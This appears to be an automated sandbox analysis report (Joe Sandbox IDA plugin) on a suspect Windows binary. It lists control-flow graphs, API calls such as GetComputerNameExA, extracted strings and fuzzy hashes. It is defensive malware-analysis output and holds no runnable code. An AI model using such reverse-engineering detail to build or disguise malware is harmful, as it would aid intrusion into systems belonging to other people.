                                                                              • Opcode Fuzzy Hash: bb4ecf429c7efec7b4fe574be1a7dfae409eda5ec1c1360cfda454b999cbf5fb
                                                                              • Instruction Fuzzy Hash: D8829975608381CFD314CF19D89076BB7E2FBC9314F198A2CE4999B291D778D905DB82
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 289 fc3943-fc4276 291 fc4278-fc427e call fa8700 289->291 292 fc4281-fc4323 call fd8070 289->292 291->292 298 fc4378-fc4381 292->298 299 fc4325 292->299 301 fc439b-fc43a7 298->301 302 fc4383-fc4389 298->302 300 fc4330-fc4376 299->300 300->298 300->300 304 fc43a9-fc43af 301->304 305 fc43bb-fc43e9 call fa8770 call fd8070 301->305 303 fc4390-fc4399 302->303 303->301 303->303 306 fc43b0-fc43b9 304->306 310 fc43ee-fc43f8 305->310 306->305 306->306 311 fc43fb-fc445d 310->311 312 fc445f 311->312 313 fc44a8-fc44b1 311->313 314 fc4460-fc44a6 312->314 315 fc44cb-fc44d7 313->315 316 fc44b3-fc44b9 313->316 314->313 314->314 318 fc44d9-fc44df 315->318 319 fc44eb-fc44f9 call fd8070 315->319 317 fc44c0-fc44c9 316->317 317->315 317->317 320 fc44e0-fc44e9 318->320 322 fc44fe-fc456b GetComputerNameExA 319->322 320->319 320->320 323 fc456d-fc456f 322->323 324 fc45b2-fc45bb 322->324 325 fc4570-fc45b0 323->325 326 fc45bd-fc45c3 324->326 327 fc45db-fc45e7 324->327 325->324 325->325 328 fc45d0-fc45d9 326->328 329 fc45e9-fc45ef 327->329 330 fc45fb-fc4679 GetComputerNameExA 327->330 328->327 328->328 331 fc45f0-fc45f9 329->331 332 fc467b 330->332 333 fc46d2-fc46db 330->333 331->330 331->331 334 fc4680-fc46d0 332->334 335 fc46dd-fc46e3 333->335 336 fc46fb-fc4707 333->336 334->333 334->334 337 fc46f0-fc46f9 335->337 338 fc4709-fc470f 336->338 339 fc471b-fc4780 336->339 337->336 337->337 340 fc4710-fc4719 338->340 342 fc47c0-fc47c9 339->342 343 fc4782 339->343 340->339 340->340 345 fc47eb-fc47f7 342->345 346 fc47cb-fc47d1 342->346 344 fc4790-fc47be 343->344 344->342 344->344 348 fc47f9-fc47ff 345->348 349 fc480b-fc488a call fd8070 345->349 347 fc47e0-fc47e9 346->347 347->345 347->347 350 fc4800-fc4809 348->350 354 fc488c-fc488f 349->354 355 fc48e9-fc48f2 349->355 350->349 350->350 356 fc4890-fc48e7 354->356 357 fc491d-fc491f 355->357 358 fc48f4-fc4902 355->358 356->355 356->356 359 fc4925-fc4933 357->359 360 fc4910-fc4919 358->360 362 fc4958-fc4961 359->362 360->360 361 fc491b 360->361 361->359 363 fc4967-fc496d 362->363 364 fc4a01-fc4a04 362->364 366 fc496f-fc4999 363->366 367 fc4940-fc4942 363->367 365 fc4a0a-fc4a50 364->365 369 fc4aa5-fc4ab0 365->369 370 fc4a52 365->370 371 fc499b-fc499e 366->371 372 fc49c0-fc49ce 366->372 368 fc4947-fc4952 367->368 368->362 374 fc4a06-fc4a08 368->374 376 fc4acb-fc4ace call fc9680 369->376 377 fc4ab2-fc4ab8 369->377 375 fc4a60-fc4aa3 370->375 371->372 378 fc49a0-fc49be 371->378 372->368 373 fc49d4-fc49fc 372->373 373->368 374->365 375->369 375->375 381 fc4ad3-fc4aef 376->381 379 fc4ac0-fc4ac9 377->379 378->368 379->376 379->379
                                                                              APIs
                                                                              • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00FC451D
                                                                              • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00FC4618
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ComputerName
                                                                              • String ID: +u7$Z8J*
                                                                              • API String ID: 3545744682-3577212644
                                                                              • Opcode ID: feb8d747d02a13a17b750d6296a2a1b85becad8b51d5253c6abddd47704db047
                                                                              • Instruction ID: 2c72b683cc0d955220b4a3e78b14fb7d87b5b88ec8cd212395f6de53a889fbd7
                                                                              • Opcode Fuzzy Hash: feb8d747d02a13a17b750d6296a2a1b85becad8b51d5253c6abddd47704db047
                                                                              • Instruction Fuzzy Hash: 02328E70544B428AD729CF34C5A5BE3BBE1AF56308F08496CD0FB8B682D779B406DB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 612 fc4084-fc4098 614 fc409a-fc40b3 612->614 615 fc40f4-fc40fd 612->615 616 fc40ff 614->616 617 fc40b5 614->617 618 fc4147-fc4148 615->618 621 fc4101-fc4108 616->621 620 fc40c0-fc40f0 617->620 619 fc4150-fc4159 618->619 619->619 622 fc415b-fc41dd 619->622 620->620 623 fc40f2 620->623 624 fc410a-fc4115 621->624 625 fc4117-fc412d 621->625 626 fc41df 622->626 627 fc4228-fc4231 622->627 623->621 628 fc4130-fc4138 624->628 625->628 629 fc41e0-fc4226 626->629 630 fc424b-fc4257 627->630 631 fc4233-fc4239 627->631 632 fc413a-fc413c 628->632 633 fc4140-fc4145 628->633 629->627 629->629 635 fc4259-fc425f 630->635 636 fc426b-fc4276 630->636 634 fc4240-fc4249 631->634 632->618 637 fc413e 632->637 633->618 634->630 634->634 638 fc4260-fc4269 635->638 640 fc4278-fc427e call fa8700 636->640 641 fc4281-fc4323 call fd8070 636->641 637->622 638->636 638->638 640->641 647 fc4378-fc4381 641->647 648 fc4325 641->648 650 fc439b-fc43a7 647->650 651 fc4383-fc4389 647->651 649 fc4330-fc4376 648->649 649->647 649->649 653 fc43a9-fc43af 650->653 654 fc43bb-fc43e9 call fa8770 call fd8070 650->654 652 fc4390-fc4399 651->652 652->650 652->652 655 fc43b0-fc43b9 653->655 659 fc43ee-fc43f8 654->659 655->654 655->655 660 fc43fb-fc445d 659->660 661 fc445f 660->661 662 fc44a8-fc44b1 660->662 663 fc4460-fc44a6 661->663 664 fc44cb-fc44d7 662->664 665 fc44b3-fc44b9 662->665 663->662 663->663 667 fc44d9-fc44df 664->667 668 fc44eb-fc44f9 call fd8070 664->668 666 fc44c0-fc44c9 665->666 666->664 666->666 669 fc44e0-fc44e9 667->669 671 fc44fe-fc456b GetComputerNameExA 668->671 669->668 669->669 672 fc456d-fc456f 671->672 673 fc45b2-fc45bb 671->673 674 fc4570-fc45b0 672->674 675 fc45bd-fc45c3 673->675 676 fc45db-fc45e7 673->676 674->673 674->674 677 fc45d0-fc45d9 675->677 678 fc45e9-fc45ef 676->678 679 fc45fb-fc4679 GetComputerNameExA 676->679 677->676 677->677 680 fc45f0-fc45f9 678->680 681 fc467b 679->681 682 fc46d2-fc46db 679->682 680->679 680->680 683 fc4680-fc46d0 681->683 684 fc46dd-fc46e3 682->684 685 fc46fb-fc4707 682->685 683->682 683->683 686 fc46f0-fc46f9 684->686 687 fc4709-fc470f 685->687 688 fc471b-fc4780 685->688 686->685 686->686 689 fc4710-fc4719 687->689 691 fc47c0-fc47c9 688->691 692 fc4782 688->692 689->688 689->689 694 fc47eb-fc47f7 691->694 695 fc47cb-fc47d1 691->695 693 fc4790-fc47be 692->693 693->691 693->693 697 fc47f9-fc47ff 694->697 698 fc480b-fc488a call fd8070 694->698 696 fc47e0-fc47e9 695->696 696->694 696->696 699 fc4800-fc4809 697->699 703 fc488c-fc488f 698->703 704 fc48e9-fc48f2 698->704 699->698 699->699 705 fc4890-fc48e7 703->705 706 fc491d-fc491f 704->706 707 fc48f4-fc4902 704->707 705->704 705->705 708 fc4925-fc4933 706->708 709 fc4910-fc4919 707->709 711 fc4958-fc4961 708->711 709->709 710 fc491b 709->710 710->708 712 fc4967-fc496d 711->712 713 fc4a01-fc4a04 711->713 715 fc496f-fc4999 712->715 716 fc4940-fc4942 712->716 714 fc4a0a-fc4a50 713->714 718 fc4aa5-fc4ab0 714->718 719 fc4a52 714->719 720 fc499b-fc499e 715->720 721 fc49c0-fc49ce 715->721 717 fc4947-fc4952 716->717 717->711 723 fc4a06-fc4a08 717->723 725 fc4acb-fc4ace call fc9680 718->725 726 fc4ab2-fc4ab8 718->726 724 fc4a60-fc4aa3 719->724 720->721 727 fc49a0-fc49be 720->727 721->717 722 fc49d4-fc49fc 721->722 722->717 723->714 724->718 724->724 730 fc4ad3-fc4aef 725->730 728 fc4ac0-fc4ac9 726->728 727->717 728->725 728->728
                                                                              APIs
                                                                              • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00FC451D
                                                                              • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00FC4618
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ComputerName
                                                                              • String ID: P6D/
                                                                              • API String ID: 3545744682-4117495492
                                                                              • Opcode ID: d1e7aea77d404fb7df50fada62a27834a9e8fa9a0e9326c549703aaf7e1f2b5f
                                                                              • Instruction ID: 0543c9ff70164de7b5f412da959e81619b43e2383313b0e6658e52494a5fe1fe
                                                                              • Opcode Fuzzy Hash: d1e7aea77d404fb7df50fada62a27834a9e8fa9a0e9326c549703aaf7e1f2b5f
                                                                              • Instruction Fuzzy Hash: 3B328E70504B828AD726CF34C9A5BE3BBE1AF16309F48496CD0FB8B682C7797446DB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 731 fc4087-fc4098 733 fc409a-fc40b3 731->733 734 fc40f4-fc40fd 731->734 735 fc40ff 733->735 736 fc40b5 733->736 737 fc4147-fc4148 734->737 740 fc4101-fc4108 735->740 739 fc40c0-fc40f0 736->739 738 fc4150-fc4159 737->738 738->738 741 fc415b-fc41dd 738->741 739->739 742 fc40f2 739->742 743 fc410a-fc4115 740->743 744 fc4117-fc412d 740->744 745 fc41df 741->745 746 fc4228-fc4231 741->746 742->740 747 fc4130-fc4138 743->747 744->747 748 fc41e0-fc4226 745->748 749 fc424b-fc4257 746->749 750 fc4233-fc4239 746->750 751 fc413a-fc413c 747->751 752 fc4140-fc4145 747->752 748->746 748->748 754 fc4259-fc425f 749->754 755 fc426b-fc4276 749->755 753 fc4240-fc4249 750->753 751->737 756 fc413e 751->756 752->737 753->749 753->753 757 fc4260-fc4269 754->757 759 fc4278-fc427e call fa8700 755->759 760 fc4281-fc4323 call fd8070 755->760 756->741 757->755 757->757 759->760 766 fc4378-fc4381 760->766 767 fc4325 760->767 769 fc439b-fc43a7 766->769 770 fc4383-fc4389 766->770 768 fc4330-fc4376 767->768 768->766 768->768 772 fc43a9-fc43af 769->772 773 fc43bb-fc445d call fa8770 call fd8070 769->773 771 fc4390-fc4399 770->771 771->769 771->771 774 fc43b0-fc43b9 772->774 780 fc445f 773->780 781 fc44a8-fc44b1 773->781 774->773 774->774 782 fc4460-fc44a6 780->782 783 fc44cb-fc44d7 781->783 784 fc44b3-fc44b9 781->784 782->781 782->782 786 fc44d9-fc44df 783->786 787 fc44eb-fc456b call fd8070 GetComputerNameExA 783->787 785 fc44c0-fc44c9 784->785 785->783 785->785 788 fc44e0-fc44e9 786->788 791 fc456d-fc456f 787->791 792 fc45b2-fc45bb 787->792 788->787 788->788 793 fc4570-fc45b0 791->793 794 fc45bd-fc45c3 792->794 795 fc45db-fc45e7 792->795 793->792 793->793 796 fc45d0-fc45d9 794->796 797 fc45e9-fc45ef 795->797 798 fc45fb-fc4679 GetComputerNameExA 795->798 796->795 796->796 799 fc45f0-fc45f9 797->799 800 fc467b 798->800 801 fc46d2-fc46db 798->801 799->798 799->799 802 fc4680-fc46d0 800->802 803 fc46dd-fc46e3 801->803 804 fc46fb-fc4707 801->804 802->801 802->802 805 fc46f0-fc46f9 803->805 806 fc4709-fc470f 804->806 807 fc471b-fc4780 804->807 805->804 805->805 808 fc4710-fc4719 806->808 810 fc47c0-fc47c9 807->810 811 fc4782 807->811 808->807 808->808 813 fc47eb-fc47f7 810->813 814 fc47cb-fc47d1 810->814 812 fc4790-fc47be 811->812 812->810 812->812 816 fc47f9-fc47ff 813->816 817 fc480b-fc488a call fd8070 813->817 815 fc47e0-fc47e9 814->815 815->813 815->815 818 fc4800-fc4809 816->818 822 fc488c-fc488f 817->822 823 fc48e9-fc48f2 817->823 818->817 818->818 824 fc4890-fc48e7 822->824 825 fc491d-fc491f 823->825 826 fc48f4-fc4902 823->826 824->823 824->824 827 fc4925-fc4933 825->827 828 fc4910-fc4919 826->828 830 fc4958-fc4961 827->830 828->828 829 fc491b 828->829 829->827 831 fc4967-fc496d 830->831 832 fc4a01-fc4a04 830->832 834 fc496f-fc4999 831->834 835 fc4940-fc4942 831->835 833 fc4a0a-fc4a50 832->833 837 fc4aa5-fc4ab0 833->837 838 fc4a52 833->838 839 fc499b-fc499e 834->839 840 fc49c0-fc49ce 834->840 836 fc4947-fc4952 835->836 836->830 842 fc4a06-fc4a08 836->842 844 fc4acb-fc4ace call fc9680 837->844 845 fc4ab2-fc4ab8 837->845 843 fc4a60-fc4aa3 838->843 839->840 846 fc49a0-fc49be 839->846 840->836 841 fc49d4-fc49fc 840->841 841->836 842->833 843->837 843->843 849 fc4ad3-fc4aef 844->849 847 fc4ac0-fc4ac9 845->847 846->836 847->844 847->847
                                                                              APIs
                                                                              • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 00FC451D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: ComputerName
                                                                              • String ID: P6D/
                                                                              • API String ID: 3545744682-4117495492
                                                                              • Opcode ID: b3c9f5e66fd42c04e0247cf6618c8761d832903a8342a93b2a0295ddf6c08234
                                                                              • Instruction ID: 5510db92b6732370b1fa8cfcf6f07a905eb2ef0f80165c22d949035f3da1709b
                                                                              • Opcode Fuzzy Hash: b3c9f5e66fd42c04e0247cf6618c8761d832903a8342a93b2a0295ddf6c08234
                                                                              • Instruction Fuzzy Hash: 3E329F70504B828AD726CF34C9A5BE3BBE1AF16309F48496CD0FB8B282D7797446DB51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 850 fa4740-fa4762 call fa86f0 853 fa4768-fa47c6 850->853 854 fa4dfc-fa4e05 850->854 855 fa47c8 853->855 856 fa47cd-fa47d5 call fa86f0 853->856 855->856 858 fa47da-fa47e3 856->858 859 fa47e9-fa47fe 858->859 860 fa4c45-fa4c4e call fa8700 858->860 861 fa4811-fa481a 859->861 860->854 863 fa481c-fa4821 861->863 864 fa4850-fa4854 861->864 866 fa4823-fa4827 863->866 867 fa4800 863->867 868 fa487e-fa4888 864->868 870 fa4834-fa483c 866->870 869 fa4802-fa480b 867->869 868->869 869->861 871 fa488d-fa4894 869->871 872 fa483e-fa4843 870->872 873 fa4830-fa4832 870->873 875 fa489b-fa49e2 call fa8770 * 3 871->875 876 fa4896 871->876 872->873 873->870 874 fa4860-fa486f call fa8710 873->874 874->867 882 fa4871-fa4879 874->882 886 fa49e8-fa49fb 875->886 887 fa4a71-fa4a8e call fa2fd0 875->887 876->875 882->868 889 fa4a43-fa4a6b call fa2fd0 886->889 892 fa4c53-fa4c54 887->892 893 fa4a94-fa4c15 887->893 898 fa4a6d-fa4a6f 889->898 899 fa4a00-fa4a41 call fa2fd0 889->899 897 fa4d1e-fa4d34 call fa8700 * 2 892->897 895 fa4c76-fa4cad 893->895 896 fa4c17-fa4c20 893->896 900 fa4caf 895->900 901 fa4d02-fa4d08 895->901 902 fa4c22 896->902 903 fa4c34-fa4c3c 896->903 897->854 898->899 899->887 899->889 906 fa4cb0-fa4d00 900->906 907 fa4d0a-fa4d0d 901->907 908 fa4d39-fa4d3b 901->908 909 fa4d13-fa4d1d 902->909 910 fa4c3e-fa4c43 903->910 911 fa4c30-fa4c32 903->911 906->901 906->906 914 fa4d0f-fa4d11 907->914 915 fa4d3d-fa4d5c 907->915 918 fa4db0-fa4df8 call fa8700 908->918 909->897 910->911 911->903 916 fa4c59-fa4c65 call fa8710 911->916 920 fa4d5e-fa4d61 914->920 915->920 916->909 927 fa4c6b-fa4c73 916->927 918->854 920->918 925 fa4d63-fa4d67 920->925 926 fa4d70-fa4dae 925->926 926->918 926->926 927->895
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: )$IDAT$IEND$IHDR
                                                                              • API String ID: 0-3181356877
                                                                              • Opcode ID: dd5cc745976acf2800f3b518cbad5844d75a034384f3a585eb90186bad444e9d
                                                                              • Instruction ID: c61b306d9ad31dc8ffd20997c6daa32efec358ee2d4731f58280e9dee9bc3634
                                                                              • Opcode Fuzzy Hash: dd5cc745976acf2800f3b518cbad5844d75a034384f3a585eb90186bad444e9d
                                                                              • Instruction Fuzzy Hash: 1D1227B1A043848FD704CF28DC9076A7BE1EFC6314F15852DE9858B392D7B9E909DB92
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: x
                                                                              • API String ID: 0-2363233923
                                                                              • Opcode ID: bec9d8048992613d3b96c924eab7795ead352d6d96ffebb35e967b461cd8f497
                                                                              • Instruction ID: 16c8b92ee443c31427a33db748ac3d1f0972ff176245c586948ea1dfbe78d626
                                                                              • Opcode Fuzzy Hash: bec9d8048992613d3b96c924eab7795ead352d6d96ffebb35e967b461cd8f497
                                                                              • Instruction Fuzzy Hash: F571A2B15087818FD324CF25C89179BBBE1AFD5314F08892DE5D98B382D639D909DB52
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: onqp
                                                                              • API String ID: 0-1718216680
                                                                              • Opcode ID: 46c1775ff32eeb0d352ed1efd99dd5f1d194763ab7d4ae1367967cb48b34328d
                                                                              • Instruction ID: ada86e95345fc22cf848e97b4ddce910c01c5050af5e1d266c97350d80f21b53
                                                                              • Opcode Fuzzy Hash: 46c1775ff32eeb0d352ed1efd99dd5f1d194763ab7d4ae1367967cb48b34328d
                                                                              • Instruction Fuzzy Hash: 85A1E0B19042018BD714DF15C8A1BABB3E1FF91764F19491DE88687391E774E910EFD2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LdrInitializeThunk.NTDLL(00FD8D36,005C003F,00000006,00120089,?,00000018,82818087,00000000,00FB4B5A), ref: 00FD3CED
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
                                                                              • Instruction ID: 55ac59dd391c444f294bf55f0ba70b893d39d4cd1a7d385863437a3e191fe89f
                                                                              • Opcode Fuzzy Hash: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
                                                                              • Instruction Fuzzy Hash: 59E0B675909216EBDA05DF44C54051EF7E2BFC4B14F55C88EE88433304C7B4AD45EA42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: E&eb
                                                                              • API String ID: 0-175690455
                                                                              • Opcode ID: f04caf18888ee5b634ead1fad84a79562bae8840c4abce1a4a0ee9e7d9ac46ae
                                                                              • Instruction ID: 639833500ecb746e3ec70f797cf5df1d3936b019c735c9646cad039c47eb344c
                                                                              • Opcode Fuzzy Hash: f04caf18888ee5b634ead1fad84a79562bae8840c4abce1a4a0ee9e7d9ac46ae
                                                                              • Instruction Fuzzy Hash: 6F3191B2A44B018BC725DF76CC81BA7B7E2EF89310F18892CD09AC7651EB75F5419B41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1746160530.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1746143920.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746189781.0000000000FDB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746207059.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746224822.0000000000FE9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746250109.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746271978.0000000001014000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1746800274.0000000001895000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4ac4b503b8bb0a2366bbc4b875a438d16d67c83e7f675032e930ab3f6cef4b37
                                                                              • Instruction ID: 42433fb1b15e5122284ed30a0215b5636ec41ea3091cb1932d56cfa57eef73a6
